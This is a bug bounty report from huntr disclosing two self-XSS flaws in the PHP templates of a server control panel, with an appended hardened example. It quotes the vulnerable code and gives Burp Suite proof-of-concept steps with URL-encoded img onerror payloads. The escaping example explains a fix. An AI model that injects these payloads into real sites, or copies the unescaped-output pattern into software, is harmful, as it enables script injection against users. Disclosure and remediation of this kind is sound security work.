huntr report F3340570-6E59-4C72-A7D1-D4B829B4FB45 by hocnc
History: Sep 17, 2023 - 9:37 a.m.

Multiple Self-XSS Vulnerabilites

2023-09-17 09:37:11
hocnc
www.huntr.dev
9
Tags: self-xss, vulnerabilities, web templates, burpsuite, harmful code injection, bug bounty

EPSS: 0.0005 (Low), percentile 17.1%

Description

Multiple self-XSS vulnerabilities can be triggered at several endpoints.

http://localhost:8083/edit/server/

There is a bug in the web/templates/pages/edit_server.php file: an attacker can control $v_timezone, which is written unescaped into the JavaScript string inside the form's Alpine.js x-data attribute.

<form
		x-data="{
			timezone: '<?= $v_timezone ?? "" ?>',
			theme: '<?= $_SESSION["THEME"] ?>',
			language: '<?= $_SESSION["LANGUAGE"] ?>',
			hasSmtpRelay: <?= $v_smtp_relay == "true" ? "true" : "false" ?>,
			remoteBackupEnabled: <?= !empty($v_backup_remote_adv) ? "true" : "false" ?>,
			backupType: '<?= !empty($v_backup_type) ? trim($v_backup_type, "'") : "" ?>',
			webmailAlias: '<?= $_SESSION["WEBMAIL_ALIAS"] ?? "" ?>',
			apiSystem: '<?= $_SESSION["API_SYSTEM"] ?>',
			legacyApi: '<?= $_SESSION["API"] ?>',
			showSystemOptions: false,
			showProtectionOptions: false,
			showPolicyOptions: false,
		}"
		id="main-form"
		name="v_configure_server"
		method="post"
	>

Proof of Concept

1. Intercept the request with Burp Suite.
2. Replace the value of $v_timezone with '}"><img+src%3d""+onerror%3d"alert(1)"><for+x-data%3d"{timezone%3a'

https://drive.google.com/file/d/1VcvdGdSXVDcAoDd1YbW5pWd8IqVKVuiE/view?usp=sharing

http://localhost:8083/add/package/

There is a bug in the web/templates/pages/add_package.php file: an attacker can control $v_backend_template, which is echoed directly into the page without escaping.

<?php
foreach ($backend_templates as $key => $value) {
	echo $v_backend_template; // raw, unescaped output of the user-controlled value
	echo "\t\t\t\t<option value=\"" . $value . "\"";
	if ((!empty($v_backend_template)) && ($value == trim($v_backend_template, "'"))) {
		echo ' selected';
	}
	echo ">" . htmlentities($value) . "</option>\n";
}
?>

Proof of Concept

1. Intercept the request with Burp Suite.
2. Replace the value of $v_backend_template with '</select><img+src%3d""+onerror%3d"alert(1)">

https://drive.google.com/file/d/1nALSSZ3uUUa9fCC3Xhn1Zz0IJ-ZKYjjV/view?usp=sharing
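Both findings above are the same mistake in two output contexts: a user-controlled value reaches a JavaScript string inside an HTML attribute (edit_server.php) and reaches raw HTML (add_package.php). The following PHP is an added example, not code from the report or from the affected project, showing the hardened form of each fragment. The helper names js_str() and h(), the render_* function names and all sample values are assumptions made for this demonstration.

```php
<?php
// Added example (not code from the report or the affected project): context-aware
// escaping for the two template spots discussed above. Helper names js_str() and
// h() and all sample values are constructed for this demonstration.

// Value that ends up inside a JavaScript string literal within an HTML attribute
// (the Alpine.js x-data case). JSON-encode it and hex-escape <, >, ', " and & so
// the bytes can neither end the JS string nor the attribute; the result carries
// its own double quotes, so the template must not add quotes around it.
function js_str(?string $value): string
{
    return json_encode(
        (string) $value,
        JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_THROW_ON_ERROR
    );
}

// Value that ends up in HTML text or inside a double-quoted HTML attribute.
function h(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Hardened version of the x-data fragment from edit_server.php. The browser
// HTML-decodes the attribute before Alpine evaluates it as JavaScript, so the
// JS-safe string is escaped once more for the attribute context.
function render_edit_server_form(?string $timezone): string
{
    return '<form x-data="{ timezone: ' . h(js_str($timezone)) . ' }"'
        . ' id="main-form" name="v_configure_server" method="post">';
}

// Hardened version of the <option> loop from add_package.php: the stray
// `echo $v_backend_template;` is gone, and both the attribute and the text of
// each option are escaped. $template only decides which option is selected.
function render_backend_options(array $backend_templates, ?string $template): string
{
    $current = trim((string) $template, "'");
    $out = '';
    foreach ($backend_templates as $value) {
        $selected = ($current !== '' && $value === $current) ? ' selected' : '';
        $out .= '<option value="' . h($value) . '"' . $selected . '>' . h($value) . "</option>\n";
    }
    return $out;
}

// Constructed inputs that try to break out of each context: the single-quoted JS
// string inside the x-data attribute, and the <select> element respectively.
$v_timezone = "UTC'}\"><b>x</b>";
$v_backend_template = "php-fpm</select><b>x</b>";
$backend_templates = ['php-fpm', 'default'];

$form = render_edit_server_form($v_timezone);
$options = render_backend_options($backend_templates, $v_backend_template);

echo $form, "\n", $options;

// Neither rendering may contain a raw tag from the input.
foreach ([$form, $options] as $html) {
    if (str_contains($html, '<b>')) {
        fwrite(STDERR, "escaping failed\n");
        exit(1);
    }
}
echo "ok: injected markup is inert in both contexts\n";
```

Run it with `php example.php`. The x-data case needs two layers on purpose: json_encode with the JSON_HEX_* flags makes the value safe as a JavaScript literal, and htmlspecialchars then makes that literal safe as attribute content, matching the order in which the browser undoes them. Using only one of the two would leave the other context open.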

